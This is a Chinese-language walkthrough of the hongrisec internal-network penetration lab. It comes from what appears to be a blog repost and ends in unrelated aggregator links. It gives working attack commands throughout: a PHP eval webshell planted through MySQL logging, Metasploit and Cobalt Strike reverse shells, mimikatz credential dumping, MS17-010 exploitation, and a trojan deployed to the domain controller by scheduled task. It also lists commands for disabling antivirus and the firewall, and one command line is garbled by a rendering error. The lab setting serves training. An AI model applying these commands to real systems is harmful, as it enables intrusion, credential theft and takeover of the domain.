这靶场称为入门很名副其实,基本操作、思路都包含了,自己动手作了,细细体会,收获还是良多的,大家细品;

环境配置

压缩包中的win7为VM1,win2003为VM2,win2008为VM3,拓扑图如下所示
在这里插入图片描述
kali设置成NAT模式,win7网络适配器1设置成自定义(VMnet1仅主机模式),网络适配器2设置成NAT模式,win2003、win2008 网络适配器设置成自定义(VMnet1仅主机模式)。主机默认开机密码都是hongrisec@2019,手动在win7的c盘下开启phpstudy。
设置完毕后VM1、VM2、VM3就在同一内网中了,只有VM1web服务器能够访问内网,所以要想访问win2008和win2003服务器必须要先拿下win7服务器,用它做跳板进内网进行横向渗透。
攻击机:kali ip:192.168.164.134 Windows ip:192.168.164.128
win7 内网ip:192.168.52.143 外网ip:192.168.164.137 在Win7主机上手动开启phpstuday
win2003 ip:192.168.52.141
win2008 ip:192.168.52.138

添加一块自定义的网卡就行,系统里已经配置好了ip,就不用在更改什么配置了;
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

一、web服务器渗透

1、拿下web管理权

在这里插入图片描述
上了大型漏扫awvs、Netsparker、zap都没有发现可利用的漏洞,连后台都没有发现(可见不能依赖扫描器),上了几个扫目录的也没有发现后台,真实后台如下,这招是真有点狠,难怪一般的都扫不到后台;
在这里插入图片描述
进入了后台,开始寻找上传点,准备写入webshell;
在这里插入图片描述
前台模板处可以进行编辑;数据库可以执行sql语句,这两点已经暗示的很明显了,上传文件管理的地方其实不能上传。。。
在这里插入图片描述
打开一个模板写入一句话(添加到第一行,第二行程序退出了,所以添加的时候也是要看代码的),甚至还可以新建一个模板也可以,接下来要找到模板的正确位置才能连接;
网站是存在目录泄露漏洞的,将所有泄露的目录都翻一遍,最终找到了模板存放的位置;
在这里插入图片描述
蚁剑连上,
在这里插入图片描述
因为有phpmyadmin,且存在root/root的弱口令漏洞,所以直接连接,navicat尝试了,是无法进行远程连接的;
在这里插入图片描述
还是用数据库写日志的老方法来添加webshell;

show variables like "%general%"
set global general_log=on;# 开启日志  
set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# 设置日志位置为网站目录
select "<?php eval($_POST[apple]);?>";

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
同样可以连接成功;
查看下身份,是管理员,也不用花心思提权啥的了,接下来愉快的开始内外渗透;
在这里插入图片描述

2、拿下web服务器

(1)基于CS的方式

如果用webshell自带命令终端来执行命令,很多命令执行不成功或不回显,所以这里先用CS或MSF取的控制权限,在来进行后续的操作;
在这里插入图片描述
在这里插入图片描述
配置好监听器:
在这里插入图片描述
生成后门上传执行一起合成;
在这里插入图片描述
成功连接,由于受害机默认60秒进行一次回传,为了实验效果我们这里把时间设置成5,sleep 5,
在这里插入图片描述
安装插件:
在这里插入图片描述
提权成功,可看到多出一个通道;
在这里插入图片描述

先进行基本信息的收集:在提权成功的情况下,以system的身份来运行下列命令,大部分都有回显,不会报错;

ipconfig /all   查看本机ip,所在域
route print     打印路由信息
net view        查看局域网内其他主机名
arp -a          查看arp缓存
net start       查看开启了哪些服务
net share       查看开启了哪些共享
net share ipc$  开启ipc共享
net share c$    开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:""   与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  建立c盘共享
dir \\192.168.xx.xx\c$\user    查看192.168.xx.xx c盘user目录下的文件  
net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 查看本机用户列表
net time /domain        #查看时间服务器,判断主域,主域服务器都做时间服务器
net user /domain         查看域用户
net localgroup administrators   查看本地管理员组(通常会有域用户)
net view /domain         查看有几个域
net user 用户名 /domain   获取指定域用户的信息
net group /domain        查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    查看域中某工作组
net group "domain admins" /domain  查看域管理员的名字
net group "domain computers" /domain  查看域中的其他主机名
net group "doamin controllers" /domain  查看域控制器(可能有多台)

整理一下信息
域:god.org
域内有三个用户:Administrator、ligang、liukaifeng01
域内三台主机:ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)、OWA
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143

这里在进行一个操作,将会话分给msf一个;
msf那边如下操作:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.164.134
lhost => 192.168.164.134
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

CS这边先新增监听器,然后选增加会话,即spawn
在这里插入图片描述
在这里插入图片描述
成功后:
在这里插入图片描述
在来一个操作,开启远程桌面;
在这里插入图片描述
3389没开;
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
输入命令后开启:
在这里插入图片描述
添加用户:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可惜就是连接不上;
nmap试了下,原来是安装了防火墙,端口被过滤了;
在这里插入图片描述

(2)基于msf的方式

转到msf,用msf来反弹shell;

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.164.134  LPORT=4444 -f exe > shell.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.134
set lport 4444
exploit

在这里插入图片描述
meterpreter的退出与进入:
在这里插入图片描述
在这里插入图片描述
常规的先提权,由于在CS里已经提过一次了,CS里是以system权限运行的程序,所以这里直接就是system权限了;
在这里插入图片描述
执行run post/windows/manage/enable_rdp模块来关闭防火墙,并使用rdesktop打开远程桌面
在这里插入图片描述
可以远程连接了:
在这里插入图片描述
因为远程登录会断开该主机当前的连接,没事还是少远程;
在这里插入图片描述
抓取密码的方法:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
ps命令查看进程ID,一般选择explorer.exe对应的PID
mimikatz_command -f sekurlsa::searchPasswords
在这里插入图片描述
找了个无参数版的mimikatz,效果最好,神器不是白叫的。。。。
在这里插入图片描述
探测域内存活主机:
run windows/gather/enum_ad_computers
在这里插入图片描述
域控列表
run windows/gather/enum_domains
在这里插入图片描述
所有存活主机
在这里插入图片描述
在这里插入图片描述
Post 后渗透模块

run post/windows/manage/migrate           #自动进程迁移
run post/windows/gather/checkvm           #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav            #关闭杀毒软件
run post/windows/manage/enable_rdp        #开启远程桌面服务
run post/windows/manage/autoroute         #查看路由信息
run post/windows/gather/enum_logged_on_users    #列举当前登录的用户
run post/windows/gather/enum_applications       #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump               #dump出所有用户的hash
run getgui -u hack -p 123
有时候无法使用后渗透模块添加用户
可以使用shell自主添加
net user hack Zyx960706 /add
net localgroup administrator hack /add
netsh advfirewall set allprofiles state off        #关闭防火墙
net stop windefend

域内存活主机探测(系统、端口)

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000),如果开放了端口,则说明该主机存活

端口扫描

auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000)
auxiliary/scanner/portscan/ack           #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口
端口扫描有时会使会话终端,所以可以上传nmap后在shell中使用nmap扫描。但是要记得清理

服务扫描

auxiliary/scanner/ftp/ftp_version        #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version        #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version  #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp            #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version      #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title             #探测内网http服务的标题
auxiliary/scanner/smb/smb_version        #发现内网smb服务,基于默认的445端口   
use auxiliary/scanner/mssql/mssql_schemadump  #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump  #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version    #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner        #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server     #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version        #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname         #探测内网主机的netbios名字

msf派生给CS:
在这里插入图片描述
在这里插入图片描述
打开msf,使用payload_inject模块注入到cobalt strike,注意使用的payload要和cs的一致为reverse_http,因为cs监听的是reverse_http

meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
# 设置与cs相同的payload,别加x64,尽管被入侵系统是x64的;
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http  
msf5 exploit(windows/local/payload_inject) > set lhost 192.168.10.128
msf5 exploit(windows/local/payload_inject) > set lport 4444
# 设置刚才获得session
msf5 exploit(windows/local/payload_inject) > set session 1
msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true
msf5 exploit(windows/local/payload_inject) > run

在这里插入图片描述
至此,web服务器已经完全拿下了,现在剩下2台纯内网的机器了;

二、横向移动,内网其他机器的渗透:

探测内网存活的主机,利用ping命令;
windows下:
for /l %p in (1,1,254) do @ping -l 1 -n 3 -w 40 192.168.52.%p & if errorlevel 1 (echo 192.168.52.%p>>na.txt) else (echo 192.168.1.%p>>ok.txt)
在这里插入图片描述
Linux下:
for i in {1…254}; do ping -q -i 0.01 -c 3 192.168.164.KaTeX parse error: Expected 'EOF', got '&' at position 3: i &̲> /dev/null && …i is alive; done

1、搭建代理

发现目标后,为方便后续工具的使用,需要先搭建代理,将web服务器搭建成socks5代理服务器,内网渗透里先把网调通是最关键的,所以下面会多讲点代理的问题;

(1)meterpreter搭建反向socks4代理

run get_local_subnets #查看路由段
run autoroute -s 192.168.52.0/24 #添加路由至本地
run autoroute -p #打印当前路由信息
在这里插入图片描述
退出来连接同样是存在的,可以放心操作;
在这里插入图片描述
添加路由的目的是为了让MSF其他模块能访问内网的其他主机,即52网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递
添加socks4a代理的目的是为了让其他软件更方便的访问到内网的其他主机的服务
(添加路由一定要在挂代理之前,因为代理需要用到路由功能)
编辑本地的代理服务:
vim /etc/proxychains.conf
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
测试一下:
proxychains nmap -p 1-1000 -Pn -sT 192.168.52.141 # -Pn和-sT必须要有
在这里插入图片描述
在这里插入图片描述
proxychains是无法代理icmp流量的,所以ping是没有用的

补充一个meterpreter反弹单个端口的用法:
portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地,并且监听.使用方法如下:

meterpreter > portfwd  -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:-L <opt>  The local host to listen on (optional).-h        Help banner.-l <opt>  The local port to listen on.-p <opt>  The remote port to connect to.-r <opt>  The remote host to connect to.

使用实例介绍:
反弹10.1.1.129端口3389到本地2222并监听那么可以使用如下方法:
meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389
meterpreter > portfwd
0: 0.0.0.0:2222 -> 10.1.1.129:3389
1 total local port forwards.
接着连接本地2222端口即可连接受害机器10.1.1.129 3389端口,如下:
root@kali:~# rdesktop 127.1.1.0:2222

(2)ew、frp搭建代理

了解清楚代理的原理之后,还可以用第三方的软件来试试,比如ew,frp;
在这里把kali的攻击机可以理解为公网,web服务器那台理解为内网,下面以ew测试:
kali:./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &
win7:ew.exe -s rssocks -d 192.168.164.134 -e 1024
在这里插入图片描述
上面的配置完后,可以开始测试了:
在这里插入图片描述
利用frp搭建socks代理
上传frp客户端及配置文件到目标机器
在这里插入图片描述
在这里插入图片描述
实践当中多用反向代理,正向的容易被防火墙拦住,所以都是将程序的服务器端架在公网,客户端在内网,做横向移动;

(3)CS搭建代理

CS添加一个代理:建立了一条由攻击机到web服务器的socks通道,socks的服务端在攻击机,也是反向代理;
在这里插入图片描述
View > Proxy Pivots复制代理链接到MSF中
在这里插入图片描述
msf5 > setg Proxies socks4/5:ip:port #让msf所有模块的流量都通过此代理走。(setg全局设置)
msf5 > setg ReverseAllowProxy true #允许反向代理,通过socks反弹shell,建立双向通道。
这里ip需要修改为CS服务器的ip;

2、第一台内网主机的打法:

开放了445端口,所以利用 use auxiliary/scanner/smb/smb_version 可以扫描系统版本,扫描结果是win2003
在这里插入图片描述
ms08-067没打下来,可以用 use auxiliary/admin/smb/ms17_010_command 执行一些系统权限的命令,添加管理员用户尝试3389登录

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user test hongrisec@2019 /add #添加用户
run #成功执行
set command net localgroup administrators test /add #管理员权限
run #成功执行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
run #成功执行

这里特别注意,因为开启3389端口命令中有两个双引号,如果整条命令外面不用单引号扩一下或者用双引号扩了,会出现一些符号闭合上的问题
远程连接一下:
在这里插入图片描述
在这里插入图片描述
还有一种思路是:
然后使用exploit/windows/smb/ms17_010_psexec 尝试去打一个shell回来,在多次尝试后终于成功了:

use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.52.141
set payload windows/meterpreter/bind_tcp
set lhost 192.168.164.134
set lport 6666
set SMBPass hongrisec@2019
set SMBUser test
run

在这里插入图片描述
在这里插入图片描述
先查看有那些补丁没有打…
run post/windows/gather/enum_patches
在这里插入图片描述

3、第二台内网主机的打法:

最后一个域控,用的共享的方法,前面已经知道了密码,先用meterpreter进入shell,然后运行命令;
net use \192.168.52.138\c$ “hongrisec@2019” /user:“administrator”
dir \192.168.52.138\c$
在这里插入图片描述
重新生成一个木马,上传,
copy c:\phpstudy\www\yxcms\shell.exe \192.168.52.138\c$
设置一个任务计划,定时启动木马之后就能够获取域控的shell了
schtasks /create /tn “test” /tr C:\shell222.exe /sc once /st 22:51 /S 192.168.52.138 /RU System /u administrator /p “hongrisec@2019”

还有一方法:
因为之前抓到了域管理的账号密码所以直接使用exploit/windows/smb/psexec模块拿下域控,且是管理员权限
在这里插入图片描述
至此,整个靶场环境完成了一遍,细细回味,学到了很多,也发现自己在内网渗透方面还缺很多知识,待后续几个靶场继续弥补吧。

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. 基于webrtc的点对点音视频聊天室开发|spring+vue.js

    WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准WebRTC能够实现点对点的视频传输,能够有效运用与视频…...

    2024/4/23 7:38:16
  2. 软件构造实验心得(一)

    从软件构造这门课中,我学到了很多编程知识 而这门课的四个实验,静下心来做,更是能令人获益匪浅 下面分享出我的实验报告,供其他同学们参考...

    2024/4/1 3:43:00
  3. C++性能之战(7)--一些凑不成一篇文章的C++优化技巧

    0. 写在最前面 本文持续更新地址:https://haoqchen.site/2020/07/11/some-cpp-optimize/ 有一些比较小的优化技巧,凑不成一篇文章,在这里做个记录。 如果觉得写得还不错,可以找我其他文章来看看哦~~~可以的话帮我github点个赞呗。 你的Star是作者坚持下去的最大动力哦~…...

    2024/4/16 0:31:57
  4. mysql的基本操作

    1. 库、表创建 CREATE DATABASE MYDATABASE; /*创建一个数据库*/ USE MYDATABASE; /*使用一个数据库*/ DROP DATABASE webexample;/*删除某个数据库*/CREATE TABLE Student/*学生表*/( Sno CHAR(5) NOT NULL, /*学号为主键*/Sname CHAR(20) NOT NULL ,/*姓名*/ Ssex…...

    2024/4/1 3:42:58
  5. jquery使用ColorBox弹出图片组浏览层

    本示例使用Jquery的ColorBox插件弹出图片组浏览层。效果预览网址:http://keleyi.com/keleyi/phtml/colorbox/ 以下是本效果的完整代码,将以下代码保存到html文件,打开即可预览效果。<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt…...

    2024/4/16 0:33:03
  6. 线程安全问题以及线程池

    解决方案一:同步代码块 格式:Synchronized(锁对象){} static class Ticket implements Runnable{ int count = 10 ; Object o = new Object(); @Override public void run() { while(true) { synchronized(o) { if(count>0) { System.out.println(“正在准备卖票”); try…...

    2024/4/28 21:44:48
  7. 使用Python爬取不同类别的豆瓣电影简介

    使用Python爬取不同类别的豆瓣电影简介 之前做过一点文本分类的工作,从豆瓣上爬取了不同类别的数千条电影的简介。 爬取目标 我们爬取的目标是 豆瓣影视,打开豆瓣网,随便点击一部电影,即可看到电影的介绍、评论等信息,我们需要爬取的是电影的简介部分。思路 通过Chrome浏览…...

    2024/4/17 22:06:06
  8. Favorite Colors —— 并查集+dfs

    应该能进 题意: 现在有n个数,然后有一些有向边。现在需要将每个数涂上色,要求如下: 1.颜色种类尽可能多 2.如果两个点指向相同颜色的点,那么这两个点的颜色相同 3.最终构造出来的颜色按顺序输出时字典序最小 题解: 我们可以发现的就是如果有一个点的入度>=2那么这些儿…...

    2024/4/19 19:32:50
  9. 使用pe安装系统windows系统

    使用pe安装系统windows系统 所需工具: 1.一个8G的u盘。 2.一个台计算机。 第一步:下载pe 首先我们登陆微PE官网,选择下载微PE程序,之所以选择这个工具,主要是其干净无广告,并不像其他的PE装机工具开机注入bios恶意广告奉献,就算使用原版微软镜像也会面临注入及非广告的风…...

    2024/5/6 0:32:54
  10. xaml

    1.认识xamlxaml是一种声明式的语言,当你看到一个标签,就意味着声明了一个对象, 对象之间的关系要么式并列,要么式包含,全都体现到标签的关系。Property 属性 Attribute 属性 前者侧重对象的属性,后侧侧重xml 文法属性,通常来说,后者的数量多于前者。<Window x:Clas…...

    2024/4/16 0:33:49
  11. 【LeetCode】62. 不同路径(动态规划)

    一、题目描述 一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。 机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。 问总共有多少条不同的路径?例如,上图是一个7 x 3 的网格。有多少可能的路径? …...

    2024/4/1 3:42:57
  12. PyTorch+cudnn安装教程

    1. PyTorch安装 先安装anaconda,在安装PyTorch安装anaconda去官网找适配系统的版本 bash Anaconda2-5.2.0-Linux-x86_64.sh 然后配置环境变量 vim ~/.bashrc安装PyTorch需要匹配python版本,CUDA版本 进入PyTorch官网https://pytorch.org/,2.cudnn安装 conda install cudnn...

    2024/4/18 2:23:37
  13. DBC转Excel;DBC转位定义;Excel转DBC;Excel转位定义;MatrixCreat(二)之DBC文件创建

    DBC文件创建一、摘要1.描述2.关键字二、什么是DBC文件三、DBC创建环境四、DBC创建过程1.软件运行2.新建DBC文件3.新建数值表4.新建信号消息5.新建报文消息6.新建网络节点7.新建自定义属性7.文件检查五、MatrixCreat工具六、其他七、参考 一、摘要 1.描述 本文主要描述的是汽车行…...

    2024/5/6 10:09:00
  14. 《C++PrimerPlus 6th Edition》第8章 函数探幽 要点记录

    《C++PrimerPlus 6th Edition》第8章 函数探幽 要点记录【本章内容】【知识点详记】8.1 C++内联函数8.2 引用变量8.3 默认参数8.4 函数重载8.5 函数模板 从这章开始内容多了起来。。。 这并非是为了应付考试弄的速成宝典,而是知识点的摘录、提取与整理,没有侧重点之分,主要目…...

    2024/4/16 0:33:08
  15. JUC学习小结(二)

    1、面试题:获得多线程的方法几种?传统的是继承thread类和实现runnable接口, java5以后又有实现callable接口和java的线程池获得2、Callable接口:面试题:callable接口与runnable接口的区别?答:(1)是否有返回值(2)是否抛异常(3)落地方法不一样,一个是run,一个是cal…...

    2024/4/16 0:33:23
  16. 如何设置过滤器Filter

    一、过滤器是什么?它是基于Servlet技术实现的,简单的来说,过滤器就是起到过滤的作用,在Web项目开发中帮我么过滤一些指定的url做一些特殊的处理。二、过滤器主要做什么?(1)过滤掉一些不需要的东西,例如一些错误的请求(2)也可以修改请求和相应的内容(3)也可以拿来过…...

    2024/4/19 0:51:05
  17. AJAX学习笔记——使用方式、readyState以及简单封装

    一、AJAX使用步骤(以post请求为例,此时需要设置请求头,get请求参数放url后面)var xhr = new XMLHttpRequest(); xhr.open(‘POST’,‘test.php’); xhr.setRequestHeader(‘Content-Type’,‘application/x-www-form-urlencoded’); xhr.send(); xhr.onreadystatechange() …...

    2024/4/16 0:32:02
  18. Nginx学习 (一) : CentOS6.5 安装Nginx

    Nginx 在现在应该也算流行了, 但是你自己没做过就是没做过, 看过多少遍其它人写的文章, 你不会的还是不会, 所以, 废话少说, 初探Nginx.我的环境就是练习机, 一台Contos 6.5 的虚拟机Nginx的文档写的挺好的, 基本上按着文档一般的安装就可以搞定它的文档地址在这儿 https://ngi…...

    2024/5/6 17:32:24
  19. Spring源码的下载、编译、使用

    1 源码下载Spring官网:https://spring.io/选择版本:解压源码2 编译源码编译源码可以参考Spring官方文档,源码git下找到1.安装gradleSpring采用的是gradle对代码进行打包的下载地址: https://gradle.org/releases/ 。下载完整或者二进制都可以。创建目录:C:\Gradle ,将下载…...

    2024/4/1 3:42:47
  20. java复习第三天-方法、数组、冒泡排序

    java SE复习第三天 -方法和数组每天复习半小时,相信日积月累的力量 声明:本类型文章用于快速复习,不适合初学者观看,请见谅。很多话用词并不专业,我只希望尽量用易于理解的方式写出来,如有问题请在评论区指出。1.方法 格式:修饰符 返回值类型 方法名(参数列表){//代码省…...

    2024/4/16 0:32:53

最新文章

  1. 快速掌握HttpClient(httpclient使用实例)

    HttpClient HttpClient可以用来提供高效的&#xff0c;最新的&#xff0c;功能丰富的支持HTTP协议的客户端编程工具包&#xff0c;并且它支持HTTP协议最新的版本和建议 就是在java中可以模拟客户端发送请求 其中通过几个核心的API完成功能&#xff1a; HttpClient,HttpClients…...

    2024/5/6 18:43:05
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/5/6 9:38:23
  3. vscode安装通义灵码

    作为vscode的插件&#xff0c;直接使用 通义灵码-灵动指间&#xff0c;快码加编&#xff0c;你的智能编码助手 通义灵码&#xff0c;是一款基于通义大模型的智能编码辅助工具&#xff0c;提供行级/函数级实时续写、自然语言生成代码、单元测试生成、代码注释生成、代码解释、研…...

    2024/5/6 2:26:42
  4. 小核引导RTOS

    参考 参考1. How does FSBL load the FreeRTOS on the small core and execute it?参考2. Duo now supports big and little cores?Come and play!Milk-V Duo, start&#xff01; 日志 FSBL Jb2829:g362832ac6-dirty:2024-04-02T13:31:1100:00 # 版本信息 st_on_reason…...

    2024/5/5 9:34:20
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/4 23:54:56
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/4 23:54:56
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/6 9:21:00
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/4 23:55:16
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/6 1:40:42
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/4 23:55:17
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/4 23:55:06
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/4 23:55:06
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/5 8:13:33
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

